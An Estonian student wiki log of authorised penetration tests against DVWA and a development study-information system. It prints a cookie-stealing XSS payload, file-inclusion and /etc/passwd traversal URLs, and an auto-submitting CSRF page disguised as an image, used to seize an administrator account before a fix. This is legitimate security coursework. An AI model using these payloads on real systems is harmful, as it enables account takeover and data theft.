Acunetix Web Vulnerability Scanner v. 8&lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/&lt;br /&gt;
&lt;br /&gt;
Pärast programmi installimist tuli seadistada skännimine, valisime keskmie põhjalikkusega skänni.&lt;br /&gt;
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.&lt;br /&gt;
Antud programm võimaldab skännida:&lt;br /&gt;
Cross-Site Scripting (XSS)&lt;br /&gt;
SQL Injection (blind test)&lt;br /&gt;
File inclusion&lt;br /&gt;
Code Execution&lt;br /&gt;
LDAP Injection&lt;br /&gt;
Cross Frame Scripting&lt;br /&gt;
SQL Injection (error msg. test)&lt;br /&gt;
CRLF Injection&lt;br /&gt;
Directory Travelsal&lt;br /&gt;
XPath Injection&lt;br /&gt;
URL Redirection&lt;br /&gt;
Application Error Message&lt;br /&gt;
&lt;br /&gt;
Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.&lt;br /&gt;
&lt;br /&gt;
Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application&#039;i.&lt;br /&gt;
&lt;br /&gt;
==== Brute Force (DVWA) ====&lt;br /&gt;
Käsitsi välja uuritud login andmed:&lt;br /&gt;
kasutajanimi: admin&lt;br /&gt;
parool: password&lt;br /&gt;
&lt;br /&gt;
===== Fireforce plugin Firefoxis =====&lt;br /&gt;
Tekitatud sai ka password list faili pass.txt.&lt;br /&gt;
&lt;br /&gt;
Kasutusel oli Firefox brauser, kuhu installisime plugin&#039;a Fireforce. &lt;br /&gt;
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .&lt;br /&gt;
&lt;br /&gt;
Panime kasutajanimeks &amp;quot;admin&amp;quot; ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.&lt;br /&gt;
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud. &lt;br /&gt;
Selleks sai sõna &amp;quot;incorrect&amp;quot;.&lt;br /&gt;
Määrata ära tuli ka, et mitu päringut sekundis tehakse. &lt;br /&gt;
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada. &lt;br /&gt;
Päringute tegemise kiirus vähem kui 1 päring/sekundis.&lt;br /&gt;
&lt;br /&gt;
Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.&lt;br /&gt;
Kasutasime ka videos näidatud &amp;quot;@ DICTIONARY&amp;quot; teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.&lt;br /&gt;
&lt;br /&gt;
Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.&lt;br /&gt;
&lt;br /&gt;
===== Burpsuite v1.4 =====&lt;br /&gt;
Burpsuite v1.4 on Samurai WTF&#039;il olemas juba sees ja saab kohe käima panna.&lt;br /&gt;
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI&#039;st]]&lt;br /&gt;
&lt;br /&gt;
Programm on juba loomult keerulisem. &lt;br /&gt;
Burpsuite&#039;iga tuleb panna käima proxy server localhost&#039;is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.&lt;br /&gt;
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine. &lt;br /&gt;
Läbi proxy serveri tuleb BurpSuite&#039;ile kohale vastava veebilehe Header sisselogimise kohta.&lt;br /&gt;
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.&lt;br /&gt;
Payload&#039;i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.&lt;br /&gt;
Ründe stiiliks määrata Pitchfork.&lt;br /&gt;
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.&lt;br /&gt;
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.&lt;br /&gt;
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -&amp;gt; Start Attack, mis siis alustas rünnet. &lt;br /&gt;
Kahjuks ka see rünne ei toiminud teadmata põhjusel. &lt;br /&gt;
Proovitud sai ka lühemate nimekirjadega ja edutult. &lt;br /&gt;
&lt;br /&gt;
Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt. &lt;br /&gt;
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.&lt;br /&gt;
&lt;br /&gt;
==== CSRF - Cross-site request forgery ====&lt;br /&gt;
Katsetamine toimub koos Taaviga.&lt;br /&gt;
&lt;br /&gt;
Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.&lt;br /&gt;
&lt;br /&gt;
Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.&lt;br /&gt;
&lt;br /&gt;
Lõime uue faili - crosssite.txt&lt;br /&gt;
&lt;br /&gt;
DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.&lt;br /&gt;
Võtsime lehe Source Code lahti&lt;br /&gt;
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.&lt;br /&gt;
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.&lt;br /&gt;
Current Password lahtri jätsime samaks.&lt;br /&gt;
Ülejäänud kahe uue passwordi fieldi type&#039;iks määrasime &amp;quot;Hidden&amp;quot; ja value&#039;deks &amp;quot;admin&amp;quot;.&lt;br /&gt;
Salvestasime faili ja käivitasime selle.&lt;br /&gt;
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.&lt;br /&gt;
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna &amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==== Reflected Cross Site Scripting (XSS)  ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Lehel on selline Form:&amp;lt;/li&amp;gt;&lt;br /&gt;
[[Image:Xsstesting.jpg|Location=&amp;quot;left&amp;quot;|Caption|]]&lt;br /&gt;
&amp;lt;br&amp;gt;Form väljastab : Hello „sisestatud nimi“&lt;br /&gt;
&amp;lt;li&amp;gt;Easy puhul:&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Saab sisestada textboxi skripti:&amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    alert(document.cookie.match(/PHPSESSID=[^;\]+/));&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: &amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    this.document.location.href  = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
    &amp;lt;li&amp;gt;Saab kohe enda veebiserveri logidest näha  Session ID’d. &lt;br /&gt;
&amp;lt;br&amp;gt;Näide logist:&amp;lt;/li&amp;gt;&lt;br /&gt;
    /var/log/apache2/access.log&lt;br /&gt;
    127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] &amp;quot;GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1&amp;quot; 404 404 &amp;quot;-&amp;quot;                  &amp;lt;br&amp;gt;  &amp;quot;Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11&amp;quot;&lt;br /&gt;
&amp;lt;li&amp;gt;Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]&lt;br /&gt;
&lt;br /&gt;
SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).&lt;br /&gt;
==== Faili üleslaadimine: madal tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Low -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.php faili saab kirjutada php koodi:&lt;br /&gt;
    &amp;lt;?php var_dump($_REQUEST, $_SERVER); ?&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:&amp;lt;/li&amp;gt;&lt;br /&gt;
  esimeses massiivis &amp;quot;PHPSESSID&amp;quot; (&amp;quot;2b1ae19446cfde009664f18df51b6ec1&amp;quot;) ja turvatase &amp;quot;security&amp;quot; (&amp;quot;low&amp;quot;);&lt;br /&gt;
  teises &amp;quot;HTTP_COOKIE&amp;quot;, milles on eelnevadki andmed; asukoht &amp;quot;PATH&amp;quot;, &amp;quot;SERVER_SOFTWARE&amp;quot;, &amp;quot;SERVER_NAME&amp;quot;,&lt;br /&gt;
    &amp;quot;SERVER_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;SERVER_PORT&amp;quot; (&amp;quot;80&amp;quot;), &amp;quot;REMOTE_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;REMOTE_PORT&amp;quot; (&amp;quot;53425&amp;quot;) jpm.&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: keskmine tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Medium -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida ei saa näiteks järgnevates formaatides faile:&amp;lt;/li&amp;gt;&lt;br /&gt;
  .htaccess&lt;br /&gt;
  .php	.html	.pdf&lt;br /&gt;
  .gif	.png	.bmp&lt;br /&gt;
  .svg	.swf&lt;br /&gt;
  .tif	.tiff	.exif&lt;br /&gt;
  .raw	.cgm&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks tuleb kasutada &amp;quot;?page=&amp;quot; ja faili asukoht:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg&lt;br /&gt;
Kuvatakse php skripti tulemus.&lt;br /&gt;
  Kommentaar: &amp;quot;?page=&amp;quot; kasutamine võetud menüüvalikust: &amp;lt;b&amp;gt;File Inclusion&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;quot;?page=&amp;quot; abil saab vaadata kasutajate nimesid:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd&lt;br /&gt;
&amp;lt;li&amp;gt;Paroole vaadata ei saa, selleks õigused puuduvad:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: kõrge tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: High -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks ei piisa ka &amp;quot;?page=&amp;quot; kasutamisest. Igal juhul on vastus selline:&amp;lt;/li&amp;gt;&lt;br /&gt;
  ERROR: File not found!&lt;br /&gt;
&amp;lt;li&amp;gt;Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://www.motobit.com/util/base64-decoder-encoder.asp&lt;br /&gt;
&amp;lt;li&amp;gt;Moodustades loodud faili asukohast kood ja kasutades&amp;lt;/li&amp;gt;&lt;br /&gt;
  data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==&lt;br /&gt;
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 3. päev ==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]&lt;br /&gt;
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.&amp;lt;br&amp;gt;&lt;br /&gt;
Faile saab alla laadida enda profiili all õppesooritustes.&amp;lt;br&amp;gt;&lt;br /&gt;
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.&amp;lt;br&amp;gt;&lt;br /&gt;
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
====Subgraph Vega ====&lt;br /&gt;
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.&lt;br /&gt;
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.&lt;br /&gt;
Programm on Java põhine graafilise liidesega ja töötab Linux&#039;i, OS X ja Windowsi peal.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]&lt;br /&gt;
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.&lt;br /&gt;
&lt;br /&gt;
Alustasime uut skänni (Start New Scan).&lt;br /&gt;
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.&lt;br /&gt;
&lt;br /&gt;
Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised. &lt;br /&gt;
&lt;br /&gt;
Me lisasime ainult küpsise (cookie) sisu: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
ning Finish.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]&lt;br /&gt;
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).&lt;br /&gt;
&lt;br /&gt;
Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000. &lt;br /&gt;
&lt;br /&gt;
Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script&#039;ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body  nõrkust.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID&#039;sid ja parameetreid ära oma pealkirjades.&lt;br /&gt;
Õnneks parameetritega väljad olid veebilehel korralikult ära escape&#039;itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.&lt;br /&gt;
&lt;br /&gt;
ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.&lt;br /&gt;
&lt;br /&gt;
==== Wapiti ====&lt;br /&gt;
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti. &lt;br /&gt;
(Koduleht: http://wapiti.sourceforge.net/)&lt;br /&gt;
&lt;br /&gt;
Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS&#039;iga midagi teha.&lt;br /&gt;
&lt;br /&gt;
==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====&lt;br /&gt;
=====1. katse - ÕISi keskkkonna keelevahetus =====&lt;br /&gt;
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]&lt;br /&gt;
&lt;br /&gt;
Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.&lt;br /&gt;
&lt;br /&gt;
Võtsime dev-ÕIS&#039;i Source Code&#039;ist välja vastava formi osa ja panime eraldi html faili.&lt;br /&gt;
Koristasime mittevajaliku disaini koodi juurest ära.&lt;br /&gt;
Muutsime form&#039;i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.&lt;br /&gt;
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks &amp;quot;en&amp;quot; ehk inglise keelne keskkond tekiks.&lt;br /&gt;
Panime koodi enose veebiserverisse üles nimega ois.html.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;form id=&amp;quot;settingsForm&amp;quot; method=&amp;quot;post&amp;quot; action=&amp;quot;https://itcollege.dev.ois.ee/setting/edit?user_id=2198&amp;quot; &lt;br /&gt;
enctype=&amp;quot;application/x-www-form-urlencoded&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;input type=&amp;quot;hidden&amp;quot; AUTOCOMPLETE=&amp;quot;off&amp;quot; name=&amp;quot;default_language&amp;quot;value=&amp;quot;en&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;br&amp;gt;&lt;br /&gt;
  &amp;lt;input type=&amp;quot;submit&amp;quot; value=&amp;quot;Salvesta seaded&amp;quot; name=&amp;quot;Savesettings&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;/form&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.&lt;br /&gt;
&lt;br /&gt;
Katsetas koodi enda konto peal Taavi.&lt;br /&gt;
&lt;br /&gt;
=====2. katse - ÕIS&#039;i kasutaja parooli muutmine =====&lt;br /&gt;
&lt;br /&gt;
[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]&lt;br /&gt;
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.&lt;br /&gt;
&lt;br /&gt;
Selle jaoks uurisime välja, kus asub dev-ÕIS&#039;i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.&lt;br /&gt;
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.&lt;br /&gt;
&lt;br /&gt;
Muutsime password ja password_check lahtrite väärtused järgnevaks: &amp;quot;test123&amp;quot; ehk kasutaja uus parool peale rünnakut.&lt;br /&gt;
&lt;br /&gt;
Lahtrites muutsime user_id&#039;d sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.&lt;br /&gt;
&lt;br /&gt;
Kõik vormi lahtrite tüübid määrasime peidetud ehk &amp;quot;hidden&amp;quot;, et poleks midagi näidata. &lt;br /&gt;
&lt;br /&gt;
Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist. &lt;br /&gt;
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.&lt;br /&gt;
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.&lt;br /&gt;
&lt;br /&gt;
Lisasime CSS koodi Submit nupu ära peitmiseks. &lt;br /&gt;
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Salvestasime faili ära kui &amp;quot;screen1.jpg&amp;quot; fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.&lt;br /&gt;
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
 &amp;lt;head&amp;gt;&lt;br /&gt;
  &amp;lt;style type=&amp;quot;text/css&amp;quot;&amp;gt;&lt;br /&gt;
	  #Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }&lt;br /&gt;
  &amp;lt;/style&amp;gt;&lt;br /&gt;
 &amp;lt;/head&amp;gt;&lt;br /&gt;
 &amp;lt;body&amp;gt;&lt;br /&gt;
  &amp;lt;body onload=&amp;quot;document.forms.setPasswordForm.submit();&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;form name=&amp;quot;setPasswordForm&amp;quot; id=&amp;quot;setPasswordForm&amp;quot; &lt;br /&gt;
  action=&amp;quot;https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&amp;amp;amp;continue=/auth/logout&amp;quot;  &lt;br /&gt;
  method=&amp;quot;post&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;user_id&amp;quot; value=&amp;quot;2227&amp;quot; id=&amp;quot;user_id&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;continue&amp;quot; value=&amp;quot;%2Fet%2Fsetting%3Fuser_id%3D2227&amp;quot; id=&amp;quot;continue&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password&amp;quot; id=&amp;quot;password&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password_check&amp;quot; id=&amp;quot;password_check&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;submit&amp;quot; name=&amp;quot;Setpassword&amp;quot; id=&amp;quot;Setpassword&amp;quot; value=&amp;quot;Muuda salasõna&amp;quot; /&amp;gt;&lt;br /&gt;
  &amp;lt;/form&amp;gt;&lt;br /&gt;
 &amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]&lt;br /&gt;
&lt;br /&gt;
Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
AddType application/x-httpd-php .php .jpg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Laadisime mõlemad failid Enose veebiserverisse avalikult. &lt;br /&gt;
&lt;br /&gt;
Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki. &lt;br /&gt;
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.&lt;br /&gt;
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle. &lt;br /&gt;
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.&lt;br /&gt;
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail. &lt;br /&gt;
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja. &lt;br /&gt;
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud &amp;quot;test123&amp;quot;-ks ja me saime ligipääsu administraatori õigustes kontole. &lt;br /&gt;
Rünnak oli edukas.&lt;br /&gt;
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]&lt;br /&gt;
&lt;br /&gt;
Andsime teada Valterile teada, et tegelikult tegime salajase ründe. &lt;br /&gt;
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha. &lt;br /&gt;
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug&#039;iga.&lt;br /&gt;
&lt;br /&gt;
